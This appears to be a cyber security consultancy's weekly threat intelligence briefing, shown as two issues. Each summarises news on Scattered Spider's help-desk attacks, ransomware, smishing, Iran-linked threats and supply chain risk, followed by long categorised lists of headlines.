Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to £440M in Damages, Widening Attacks to Insurance, Aviation and Transportation Sectors
Recent cyber attacks on UK retailers Marks & Spencer and Co-op, linked to the same criminal group Scattered Spider, have resulted in combined damages estimated between £270 million and £440 million. These incidents exploited social engineering, where attackers tricked IT help desks to gain access. The attacks are considered a significant event with deep impacts on both firms and their suppliers. Experts warn that Scattered Spider is now targeting the insurance, aviation and transportation sectors, urging heightened vigilance.
https://thehackernews.com/2025/06/scattered-spider-behind-cyberattacks-on.html
Netflix, Apple, BofA Websites Hijacked with Fake Help-Desk Numbers
Cyber criminals are hijacking search results for major brands like Netflix, Apple, and Bank of America, placing fake ads that lead victims to authentic-looking support pages showing fraudulent phone numbers. When users call these numbers, scammers posing as help-desk staff trick them into giving away personal or financial details, or granting remote access to their devices. This attack exploits weaknesses in website search functions and is difficult for browsers to detect. Organisations should raise awareness that legitimate support will never request sensitive information over the phone, and staff should be wary of unsolicited phone numbers in search results.
https://www.theregister.com/2025/06/20/netflix_apple_bofa_websites_hijacked/
Police Alerts About New SMS “Blaster” Scams Used for Smishing
UK Police have highlighted a rise in smishing attacks involving SMS blasters; these are radio devices that attract and connect to mobile phones in the area, and then send out text messages to those phones appearing to be from trusted organisations. A recent case saw a man jailed for sending thousands of scam messages from a car in London to steal personal information. Although some networks have blocked millions of scam texts, individuals are urged to avoid engaging with suspicious messages and report them to their mobile network provider. Disabling 2G on Android or filtering unknown senders on iPhones can further reduce exposure to these threats.
https://cybernews.com/news/police-alerts-about-new-sms-blaster-scams-used-for-smishing/
Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
A new report from SecurityScorecard shows that 5 in 6 organisations face heightened cyber security risks due to outdated supply chain defences. Third-party involvement in breaches has doubled to nearly 30%, yet fewer than half of firms monitor cyber security across even half of their extended supply chains. Over 70% have suffered at least one serious third-party incident in the past year. Experts warn that without integrated detection and incident response, organisations remain vulnerable to cascading impacts from supply chain cyber attacks.
Businesses Urged to Strengthen Cyber Defences Amid Increase in Iran-Adjacent Attacks
Cyber security experts have warned of a sharp rise in cyber attacks linked to Iran following the recent Israel-Iran conflict, with UK, US and EU businesses targeted. Attacks have included attempts to crash systems by overwhelming them with traffic, malicious software designed to delete data, and coordinated disinformation campaigns. UK Prime Minister Sir Keir Starmer described these cyber attacks as assaults on the UK itself, urging firms to urgently review and strengthen their cyber security. Experts caution that companies may be targeted simply for being connected to Western interests. Organisations are urged to strengthen security by promptly applying updates, using strong access controls, and preparing incident response plans. Experts stress the importance of employee awareness and real-time monitoring to counter sophisticated attack techniques aimed at disruption and data theft.
National Security Strategy 2025: Security for the British People in a Dangerous World
The UK’s National Security Strategy 2025 sets out the country’s response to an increasingly dangerous world, committing to spend 5% of GDP on national security by 2035. It highlights rising threats from Russia, China and Iran, and warns of growing cyber attacks undermining public services. The strategy stresses stronger borders, revitalising the defence industry, and aligning technology and economic resilience with security goals. It calls for a national effort to build resilience, improve cyber defences and ensure stability at home and abroad, emphasising that economic security and technological advantage are now central to protecting the British people.
How Geopolitical Tensions Are Shaping Cyber Warfare
Geopolitical tensions are fuelling a surge in cyber attacks as nation-state-backed groups target governments, finance, and infrastructure with increasing speed and sophistication. Iran focuses on disruption for political gain, North Korea pursues profit through theft, and Russia and China aim for long-term strategic advantage. Attackers often reuse old tools with new delivery methods, exploiting poor patching and weak user awareness. Artificial intelligence is compounding risks by enabling precise, large-scale attacks. To remain resilient, organisations must combine strong basics like patching and training with intelligence-led testing of defences tailored to the specific threats they face.
https://www.darkreading.com/vulnerabilities-threats/geopolitical-tensions-shape-cyber-warfare
Governance, Risk and Compliance
Comms Business - Almost 40 per cent of SMEs have no cyber security training, BT survey finds
BT says nearly half small businesses have suffered a cyber attack in the last year
Cyber security neglect issue for UK businesses? - The Recycler
More than half of cyber security professionals told to conceal breaches, survey claims
SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
Cyber security Governance: A Guide for Businesses to Follow | TechTarget
Is Your CISO Ready to Flee? - Security Boulevard
After a hack many firms still say nothing, and that’s a problem - Help Net Security
Cyber attacks on insurers put CFOs on high alert | Fortune
How CISOs can justify security investments in financial terms - Help Net Security
How Executives Could Respond When Faced With Multiple Crisis Situations
How Customer Trust Can Shield Your Business In A Crisis
What is Risk Avoidance? | Definition from TechTarget
How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine
Threats
Ransomware, Extortion and Destructive Attacks
Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
UK ransomware costs significantly outpace other countries | Computer Weekly
Four REvil ransomware crooks walk free after admitting guilt • The Register
Ransomware threat actors today and how to thwart them | TechTarget
Cyber criminals cash in on stolen cookies and credentials | Insurance Business America
Qilin Ransomware Adds "Call Lawyer" Feature to Pressure Victims for Larger Ransoms
Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert
Dire Wolf Ransomware Comes Out Snarling, Bites Verticals
Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer
Ransomware Victims
Major insurer hit by giant cyber attack | Insurance Business America
M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages
M&S cyber-attack boosted sales at Next, Zara and H&M
Patient death at London hospital linked to cyber attack on NHS – DataBreaches.Net
M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette
3 key takeaways from the Scattered Spider attacks on insurance firms
Whole Foods supplier UNFI restores core systems after cyber attack
Services disrupted as cyber attack hits Glasgow Council - UKTN
Phishing & Email Based Attacks
Report on New Hires and Phishing Susceptibility
Microsoft 365 'Direct Send' abused to send phishing as internal users
Other Social Engineering
Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian
How Foreign Scammers Use US Banks to Fleece Americans — ProPublica
ClickFix attacks skyrocketing more than 500% - Help Net Security
New FileFix Method Emerges as a Threat Following 517% Rise in ClickFix Attacks
New wave of ‘fake interviews’ use 35 npm packages to spread malware
Fraud, Scams and Financial Crime
Netflix, Apple, BofA sites hijacked with fake help numbers • The Register
Police warn of SMS scams as ‘blaster’ is used to send thousands of texts | Scams | The Guardian
How Foreign Scammers Use U.S. Banks to Fleece Americans — ProPublica
Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine
Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine
Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine
UK cyber attacks set to continue amid ‘fraud pandemic’, security experts warn | The Independent
Amazon Prime Day Is Coming — How To Protect Yourself From Scammers
Artificial Intelligence
New AI Jailbreak Bypasses Guardrails With Ease - SecurityWeek
Most AI and SaaS apps are outside IT's control - Help Net Security
Reported Impersonation Scams Surge 148% as AI Takes Hold - Infosecurity Magazine
AI Is Behind 50% Of Spam — And Now It’s Hacking Your Accounts
AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED
Navigating Generative AI's Expanding Capabilities and Evolving Risks
Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine
Vulnerability in Public Repository Could Enable Hijacked LLM Responses | Security Magazine
And Now Malware That Tells AI to Ignore It?
Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine
We know GenAI is risky, so why aren't we fixing its flaws? - Help Net Security
US Army Blocks Air Force's AI Program Over Data Security Concerns | Air & Space Forces Magazine
Malware
Researchers discover first malware to exploit AI prompt injection
And Now Malware That Tells AI to Ignore It?
Malware Campaign Uses Rogue WordPress Plugin to Skim Credit Cards - Infosecurity Magazine
20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
Threat Actor Trojanizes Copy of SonicWall NetExtender App
Attackers Wield Signed ConnectWise Installers as Malware
New wave of ‘fake interviews’ use 35 npm packages to spread malware
Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН
Prometei botnet activity has surged since March 2025
WinRAR patches bug letting malware launch from extracted archives
Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks
OneClik Malware Targets Energy Sector Using Microsoft ClickOnce and Golang Backdoors
Bots/Botnets
Prometei botnet activity has surged since March 2025
Half of Customer Signups Are Now Fraudulent - Infosecurity Magazine
Mobile
Godfather Malware Targets 400+ Banking Apps Worldwide
SparkKitty Swipes Pics From iOS, Android Devices
What to do if your mobile phone account is hacked or number stolen | Mobile phones | The Guardian
Denial of Service/DoS/DDoS
Cloudflare blocked record-breaking 7.3 Tbps DDoS attack against a hosting provider
Record DDoS pummels site with once-unimaginable 7.3Tbps of junk traffic - Ars Technica
Internet of Things – IoT
Typhoon-like gang slinging TLS certificate 'signed' by LAPD • The Register
Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek
Ransomware in Cars: Why Automotive Cyber Attacks Are Spiking in 2025 | Raleigh News & Observer
DSIT identifies cyber security weaknesses in IoT devices | UKAuthority
Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot
Medical device cyber attacks push hospitals into crisis mode - Help Net Security
Data Breaches/Leaks
Supply Chain Attack Hits Swiss Banks | SC Media UK
Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET
Oxford City Council suffers breach exposing two decades of data
Hacker 'IntelBroker' charged in US for global data theft breaches
Steel Giant Nucor Confirms Data Stolen in Cyber Attack
Cyber attacks at two Melbourne hospitals expose patient details on dark web
Hawaiian Airlines discloses cyber attack, flights not affected
Former US Army Sergeant admits he sold secrets to China • The Register
Advance Auto Parts data breach class action settlement
Organised Crime & Criminal Actors
Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek
Man pleads guilty to hacking networks to pitch security services
British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek
Money mule networks evolve into hierarchical, business-like criminal enterprises - Help Net Security
Africa Sees Surge in Cyber Crime as Law Enforcement Struggles
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Attackers Target Docker APIs in Stealthy Crypto Heist
Supply Chain and Third Parties
SecurityScorecard Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
Supply Chain Attack Hits Swiss Banks | SC Media UK
M&S and Co-op Hacks Classified as Single Cyber Event - Infosecurity Magazine
Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to $592M in Damages
Most organisations are at risk thanks to immature supply chain security | TechRadar
M&S cyber attack deepens as tech partner TCS denies blame - Retail Gazette
MSPs Juggle High Breach Rates and Strong Cyber Confidence | MSSP Alert
Security pro counts the cost of Microsoft dependency • The Register
Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks
Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard
Officials set out cyber security charter for NHS suppliers | UKAuthority
Cloud/SaaS
Most AI and SaaS apps are outside IT's control - Help Net Security
The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience
Why Are CISOs Prioritizing Snowflake Security? The Breach Playbook Has Changed. - Security Boulevard
Hackers abuse Microsoft ClickOnce and AWS services for stealthy attacks
When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs
Outages
UK mobile telco Three suffers voice, text outage • The Register
Encryption
China breaks RSA encryption with a quantum computer - Earth.com
Quantum risk is already changing cyber security - Help Net Security
Home Office anti-encryption site pushes payday loan scheme • The Register
Linux and Open Source
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
Linux flaws chain allows Root access across major distributions
French city of Lyon ditching Microsoft for FOSS • The Register
Passwords, Credential Stuffing & Brute Force Attacks
Heard about the 16 billion passwords leak? Here are the facts and how to protect yourself | ZDNET
Cyber criminals cash in on stolen cookies and credentials | Insurance Business America
Brother printer bug in 689 models exposes default admin passwords
Social Media
Regulations, Fines and Legislation
Home Office anti-encryption site pushes payday loan scheme • The Register
How to Keep Up with Overlapping Cyber Security Regulations in Finance - Infosecurity Magazine
Top Pentagon spy pick rejected by White House - POLITICO
WhatsApp messaging app banned on all US House of Representatives devices | WhatsApp | The Guardian
CISA Is Shrinking: What Does It Mean for Cyber?
Foreign aircraft, domestic risks | CSO Online
Models, Frameworks and Standards
New Cyber Blueprint to Scale Up the EU Cyber Security Crisis Management | ENISA
Careers, Working in Cyber and Information Security
Why work-life balance in cyber security must start with executive support - Help Net Security
Getting a career in cyber security isn’t easy, but this can help
UK Gov Cyber Security Jobs Average Salary is Under £45,000, Study Finds - Infosecurity Magazine
Charming Kitten APT Tries Spying on Israeli Cyber Experts
Law Enforcement Action and Take Downs
Man Who Hacked Organisations to Advertise Security Services Pleads Guilty - SecurityWeek
British Man Suspected of Being the Hacker IntelBroker Arrested, Charged - SecurityWeek
20,000 Malicious IPs And Domains Taken Down In INTERPOL Infostealer Crackdown – Eurasia Review
Four REvil ransomware crooks walk free after admitting guilt • The Register
Hacker 'IntelBroker' charged in US for global data theft breaches
Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
How Cyber Warfare Changes the Face of Geopolitical Conflict
How Geopolitical Tensions Are Shaping Cyber Warfare
Cyber warfare escalates: Israel and Iran's digital conflict
Nation State Actors
How Cyber Warfare Changes the Face of Geopolitical Conflict
Are we making hackers sound too cool? These security experts think so | TechRadar
Decade of risk: signaling security in an era of geopolitical tension - DCD
China
Stealthy backdoor found hiding in SOHO devices running Linux - Help Net Security
China breaks RSA encryption with a quantum computer - Earth.com
Chinese APT Hacking Routers to Build Espionage Infrastructure - SecurityWeek
China-linked APT Salt Typhoon targets Canadian Telecom companies
Indian police arrest 10 for laundering fraud proceeds for a Chinese gang | Cryptopolitan
Former US Army Sergeant admits he sold secrets to China • The Register
China increases cyber attacks on hospitals to ‘humiliate’ Taiwan
Russia
APT28 hackers use Signal chats to launch new malware attacks on Ukraine
XDigo Malware Exploits Windows LNK Flaw in Eastern European Government Attacks
Cyber attacks on state bodies: a multi-level interaction scheme via Word and Signal revealed | УНН
Iran
Cyber warfare escalates: Israel and Iran's digital conflict
Israel urges citizens to turn off home cameras as Iran hacks surveillance systems | TechSpot
The real threat to the UK from Iran - from sleeper cells to cyber attacks
Israel expands cyber powers amid rising threats—via WhatsApp | Ctech
Tools and Controls
Most AI and SaaS apps are outside IT's control - Help Net Security
Are we making hackers sound too cool? These security experts think so | TechRadar
The Hidden Risks of SaaS: Why Built-In Protections Aren't Enough for Modern Data Resilience
When the Cloud Goes Down, Will Your Security Go With It? | Symantec Enterprise Blogs
And Now Malware That Tells AI to Ignore It?
AI Agents Are Getting Better at Writing Code—and Hacking It as Well | WIRED
Half of Security Pros Want GenAI Deployment Pause - Infosecurity Magazine
Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET
Don’t be distracted by AI – fundamental cyber skills are still key | TechRadar
Bring Your Own Installer EDR Bypass Observed in Ransomware Operation | MSSP Alert
What is Risk Avoidance? | Definition from TechTarget
How CISOs can justify security investments in financial terms - Help Net Security
How Executives Could Respond When Faced With Multiple Crisis Situations
Other News
BT says nearly half small businesses have suffered a cyber attack in the last year
Microsoft rolls out Windows security changes to prevent another CrowdStrike meltdown | ZDNET
Services disrupted as cyber attack hits Glasgow Council - UKTN
Cyber attacks on insurers put CFOs on high alert | Fortune
EU and Australia commit to Defence Partnership | Cybernews
Building cyber resilience in the financial sector
Decade of risk: signaling security in an era of geopolitical tension - DCD
Medical device cyber attacks push hospitals into crisis mode - Help Net Security
Cyber Intel Pros and Hobbyists Can Now Report Threats Anonymously - Infosecurity Magazine
French city of Lyon ditching Microsoft for FOSS • The Register
Security pro counts the cost of Microsoft dependency • The Register
Some European Countries Are Ditching Microsoft Software For Good (And Here's Why That Matters)
Denmark is switching to Linux | PC Gamer
Dual-Use Military and Civil Airports Face Cyber Threats
The Security Fallout of Cyber Attacks on Government Agencies - Security Boulevard
Cyber Skills Today for Economic Growth Tomorrow
Vulnerability Management
'7% of organisations tackle vulnerabilities only when necessary' - Data Centre & Network News
CISA Is Shrinking: What Does It Mean for Cyber?
Irish businesses show gaps in cyber security as 6 in 10 overlook regular software updates
Vulnerabilities
Critical Citrix NetScaler bug fixed, upgrade ASAP! (CVE-2025-5777) - Help Net Security
Up next on the KEV? All signs point to 'CitrixBleed 2' • The Register
Critical RCE Flaws in Cisco ISE and ISE-PIC Allow Unauthenticated Attackers to Gain Root Access
Linux flaws chain allows Root access across major distributions
Threat Actor Allegedly Selling FortiGate API Exploit Tool Targeting FortiOS
Hundreds of MCP Servers at Risk of RCE and Data Leaks - Infosecurity Magazine
Asana Fixes Security Flaw in AI Data Integration Tool
Chrome 138, Firefox 140 Patch Multiple Vulnerabilities - SecurityWeek
Millions of Brother Printers Hit by Critical Unpatchable Bug
CISA Adds 3 Flaws to KEV Catalog, Impacting AMI MegaRAC, D-Link, Fortinet
Critical Open VSX Registry Flaw Exposes Millions of Developers to Supply Chain Attacks
WinRAR patches bug letting malware launch from extracted archives
Critical Teleport Vulnerability Let Attackers Remotely Bypass Authentication Controls
Flaw in Notepad++ installer could grant attackers SYSTEM access (CVE-2025-49144) - Help Net Security
Motors Theme Vulnerability Exploited to Hack WordPress Websites - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness; linking to or reposting external content does not endorse any service or product, and likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 20 June 2025
Black Arrow Cyber Threat Intelligence Briefing 20 June 2025:
-Survey Reveals 98% of CISOs Anticipate Increased Cyber Attacks Within Three Years
-Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals
-IT Helpdesk Scams are Ramping Up – Here’s What Leaders Can Do
-Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
-Why CISOs Must Align Business Objectives and Cyber Security
-Scattered Spider has Moved from Retail to Financial Services, Insurance Now Targeted
-Ransomware Thrives in Shook-Up Criminal Underworld
-Russian Gang’s Cyber Attack on UK Blood Services ‘Harmed 170 Patients’
-Experts Warn Clicking "Unsubscribe" Could Actually be a Security Risk, Here's Why
-Security Is Only as Strong as the Weakest Third-Party Link
-Employees Are Using AI Where They Know They Shouldn’t
-Threat of Cyber Attacks from Iran Concern Security Experts
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.
Executive Summary
Our review of cyber security in specialist and general media this week features a survey of 300 CISOs where 98% expect increased cyber threats within three years, with growing concern over third-party risks and hybrid outsourcing models. A separate survey revealed that 69% of managed service providers (MSPs) reported multiple cyber breaches in the last 12 months, highlighting supply chain risks to be managed by organisations including the popular attack tactic of IT Helpdesk scams. We also report on the evolution of phishing using agentic-AI and deepfake, and the use of ‘unsubscribe’ buttons on phishing emails to compromise the recipient’s systems.
The structure and tactics of the criminal ecosystem continue to evolve. New attacker groups are emerging as others disappear, and existing groups are moving from the retail sector to target financial services, while Iranian cyber attackers are coming to the fore. We also report on the need for CISOs to demonstrate board-level alignment of security and business growth, and the need for stronger governance over the use of AI in organisations.
At Black Arrow Cyber Consulting, we strongly believe these developing risks are best addressed through an organisation-wide approach to security. In line with globally respected frameworks, this starts with governance by a leadership team that has a strong understanding of the fundamentals of cyber security, using controls across people, operations and technology to address the evolving risks, including social engineering, third-party risks, and AI.
Top Cyber Stories of the Last Week
Survey Reveals 98% of CISOs Anticipate Increased Cyber Attacks Within Three Years
CSC’s latest global survey of 300 CISOs found that 70% believe security threats will increase in the next year and almost all (98%) predict an increase in the next three years. The study also highlights a rise in cyber security budgets and growing reliance on hybrid outsourcing models, though concerns remain over third-party access and poor compliance by domain providers.
https://www.techmonitor.ai/technology/cybersecurity/csc-survey-cisos-anticipate-cyberattacks
Over Two Thirds of MSPs Hit by Multiple Breaches in Past Year, Survey Reveals
CyberSmart’s latest survey reveals that managed service providers (MSPs) remain a key target for cyber criminals, citing recent examples of organisations being attacked through their MSP. 69% of MSP participants reported multiple breaches in the last 12 months, with almost half facing three or more. 39% felt prepared to offer a solution or guidance to customers in meeting their cyber security regulations, which could include DORA or NIS2. The report notes opportunities to further strengthen cyber resilience. MSPs named continuous monitoring, employee cyber security training, and proactive risk management as the measures most likely to help them improve cyber confidence.
https://www.itsecurityguru.org/2025/06/19/over-two-thirds-of-msps-hit-by-multiple-breaches-in-past-year-survey-reveals/
IT Helpdesk Scams are Ramping Up – Here’s What Leaders Can Do
IT helpdesk scams are becoming more sophisticated, targeting staff across legal, financial and other high-value sectors. Attackers often pose as internal IT support to trick users into installing legitimate remote access tools, giving criminals control of systems. Recent breaches at retailers M&S and the Co-op highlight how even trained IT staff can be manipulated. Criminal groups and state actors alike are adopting these tactics, increasingly enhanced by artificial intelligence to personalise interactions and build trust. With technical controls often bypassed, firms must invest in regular user training, restrict admin rights, and block unauthorised remote access tools to reduce risk.
https://www.itpro.com/security/cyber-attacks/it-helpdesk-scams-are-ramping-up-heres-what-to-do
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
Phishing is entering a new phase, with AI-driven threats set to challenge traditional defences. Known as Phishing 3.0, this wave combines highly convincing deepfakes and autonomous AI agents capable of executing entire campaigns without human input. These tools can convincingly mimic voices or faces of trusted individuals, increasing the risk of fraud and data loss. A recent study found that current defences miss over two-thirds of phishing emails. To remain resilient, organisations must invest in advanced AI-powered detection and raise staff awareness to spot fake communications that appear authentic and urgent. The threat is growing rapidly, and preparation is essential.
Why CISOs Must Align Business Objectives and Cyber Security
A successful chief information security officer (CISO) must align cyber security with business objectives to support growth, innovation and resilience. As cyber threats grow more complex, including silent long-term intrusions and AI-driven attacks, CISOs must take a proactive approach that secures operations without hindering them. This requires board-level engagement, clarity over roles and responsibilities, and regular communication with other executives. Shared ownership of cyber risk across leadership teams fosters a culture where business and security priorities work in tandem. Simulations, modern tools, and well-structured processes further help ensure the organisation is prepared before a major incident occurs.
Scattered Spider has Moved from Retail to Financial Services, Insurance Now Targeted
The cyber crime group known as Scattered Spider has shifted its focus from retailers to the insurance sector, prompting warnings from Google for firms to be on high alert. Several US insurers, including Erie and Philadelphia Insurance, have reported system outages linked to unauthorised access, with investigations still ongoing. The group is known for using fake helpdesk calls to gain access before deploying ransomware. Google recommends enhanced caller verification, stronger authentication methods, and helpdesk training to reduce the risk. The prolonged disruption highlights the need for robust cyber security defences across the financial and insurance sectors.
https://www.theregister.com/2025/06/16/scattered_spider_targets_insurance_firms/
Ransomware Thrives in Shook-Up Criminal Underworld
The ransomware threat landscape is evolving rapidly, with a wave of new groups emerging as older operations disappear. A recent surge in attacks linked to groups such as SafePay, Qilin, Play and Akira accounted for 64 victims in May alone, with organisations in the UK, US, and Europe among those affected. The collapse of major players like RansomHub has triggered fierce competition among criminal groups, leading to greater fragmentation and more sophisticated tactics. Some attacks now appear to serve dual purposes, including espionage. Meanwhile, code reuse from defunct groups like REvil shows that while names may change, the threat remains constant.
https://www.govinfosecurity.com/ransomware-thrives-in-shook-up-criminal-underworld-a-28739
Russian Gang’s Cyber Attack on UK Blood Services ‘Harmed 170 Patients’
A ransomware cyber attack carried out by a Russian criminal group last year severely disrupted pathology services at London hospitals and GP surgeries, directly impacting patient care. The incident, which targeted the provider Synnovis, led to the cancellation of over 10,000 medical appointments and halted blood testing across many GP practices. Reports now confirm that nearly 600 incidents were linked to the disruption, with 170 patients suffering direct harm. These included one case of severe harm and 14 of moderate harm. The attack highlights the real-world consequences of digital vulnerabilities in critical healthcare systems.
https://www.lbc.co.uk/tech/russian-gangs-cyber-attack-on-blood-services-harmed-170-patients/
Experts Warn Clicking "Unsubscribe" Could Actually be a Security Risk, Here's Why
Clicking “unsubscribe” in spam emails may expose users to cyber attacks, experts warn. Threat actors often use these buttons to redirect recipients to harmful websites or confirm active email addresses for future targeting. Research suggests around 1 in 600 clicks lead to malicious content. If the sender is unfamiliar or untrusted, using the unsubscribe option is not advised. Instead, users should rely on built-in unsubscribe features within their email client, use spam filters, or create disposable email addresses to minimise risk. This highlights the need for caution when managing unwanted emails, even in seemingly routine actions.
Security Is Only as Strong as the Weakest Third-Party Link
Third-party risks are now a major contributor to data breaches, accounting for 30% of incidents. High-profile incidents have shown how supplier vulnerabilities can disrupt operations at scale. To remain resilient, security leaders must shift to continuous monitoring and treat third-party risks as their own. With rising complexity and resource constraints, technology and smarter assessments are vital to protecting businesses in an increasingly interconnected environment.
https://www.darkreading.com/vulnerabilities-threats/security-strong-weakest-third-party-link
Employees Are Using AI Where They Know They Shouldn’t
Many employees are using artificial intelligence tools in ways they know they shouldn’t, including for sensitive tasks such as safety decisions and personnel matters. Despite this, 86% of staff lack confidence in AI’s accuracy, and most feel undertrained in its practical use. Smaller firms in particular struggle with adoption, with nearly half of employees unsure how to use AI effectively. Business leaders should take urgent steps to improve staff training, introduce clear and enforceable AI policies, and avoid deploying tools without defined purpose or oversight, as failure to do so risks both misuse and missed productivity gains.
https://www.helpnetsecurity.com/2025/06/18/employees-ai-potential/
Threat of Cyber Attacks from Iran Concern Security Experts
Cyber security experts are warning of a heightened threat of cyber attacks linked to Iran, particularly in light of ongoing regional tensions. Sectors such as energy, finance and transport are viewed as high-risk due to their potential for widespread disruption. Experts have noted the use of advanced phishing techniques and malware targeting critical systems, including those controlling fuel supplies and public infrastructure. Activity from both state-sponsored and sympathetic groups has increased, with dormant hacking groups resurfacing and issuing threats. Businesses are advised to strengthen defences and report suspicious activity, especially where remote access or unpatched systems are involved.
https://www.washingtontimes.com/news/2025/jun/18/cyber-pros-warn-digital-threats-spreading-iran/
Governance, Risk and Compliance
Survey reveals 98% of CISOs anticipate increased cyber attacks within three years – Tech Monitor
Why CISOs Must Align Business Objectives & Cyber Security
Cyber Security Strategy Shifts Amid Global Political Tensions
How to Break the Security Theater Illusion
Bridging the Gap Between CEOs and CISOs for AI Adoption | MSSP Alert
What is a compliance audit? (with an example checklist) | TechTarget
Security Is Only as Strong as the Weakest Third-Party Link
Security Evolution: From Pothole Repair to Road Building
Choosing a Clear Direction in the Face of Growing Cyber Security Demands - SecurityWeek
7 trends shaping digital transformation in 2025 - and AI looms large | ZDNET
How C-suite roles are shaping the future of tech leadership - Help Net Security
15 Emerging Cyber Security Threats and How to Prepare - DevX
Changing nature of cyber threat leads to ‘brittle’ risk landscape - Insurance Post
Threats
Ransomware, Extortion and Destructive Attacks
Scattered Spider Using Aggressive Social Engineering Techniques to Deceive IT Support Teams
IT helpdesk scams are ramping up – here’s what leaders can do | IT Pro
Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion
Scattered Spider targets insurance firms, Google warns • The Register
Hackers switch to targeting US insurance companies
Ransomware Thrives in Shook-Up Criminal Underworld
Qilin Ransomware Emerges as World's Top Threat, Demands $50 Million Ransom
Fog ransomware attacks use employee monitoring tool to break into business networks | TechRadar
How cyber insurers are adapting to the new ransomware playbook | Insurance Business America
Anubis ransomware adds wiper to destroy files beyond recovery
Ransomware Group Qilin Offers Legal Counsel to Affiliates - Infosecurity Magazine
Ransomware gang busted in Thailand hotel raid
Don’t Get Caught in Scattered Spider’s Web | McCarter & English, LLP - JDSupra
Ransomware 3.0: A Glimpse Into the Post-Trust Ecosystem
Bert Ransomware: What You Need To Know | Fortra
Cyber attack purportedly compromises Scania’s corporate insurance subsidiary | SC Media
Ryuk ransomware’s initial access expert extradited to the US
Ransomware Victims
Russian gang’s cyber attack on blood services ‘harmed 170 patients’ - LBC
Victoria’s Secret restores critical systems after cyber attack
Freedman HealthCare targeted by cyber extortionists • The Register
Cyber attack pushes German napkin company into insolvency – DataBreaches.Net
2 Insurers Say Ongoing Outages Are Not Caused by Ransomware
Phishing & Email Based Attacks
Phishing 3.0: Agentic AI Ushers in New Generation of Unprecedented Risk
ChainLink Phishing: How Trusted Domains Become Threat Vectors
Why You Should Think Twice Before You Click ‘Unsubscribe’ in an Email - WSJ
Researcher shows how Android notifications can be a phisher's gold mine
Phishing goes prime time: Hackers use trusted sites to hijack search rankings | CSO Online
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse - SecurityWeek
MailerLite warns of phishing campaign • Graham Cluley
Microsoft 365 security in the spotlight after Washington Post hack - Neowin
Washington Post email breach under probe | Cybernews
Other Social Engineering
SCATTERED SPIDER Using Aggressive Social Engineering Techniques to Deceive IT Support Teams
IT helpdesk scams are ramping up – here’s what leaders can do | IT Pro
North Korean hackers deepfake execs in Zoom call to spread Mac malware
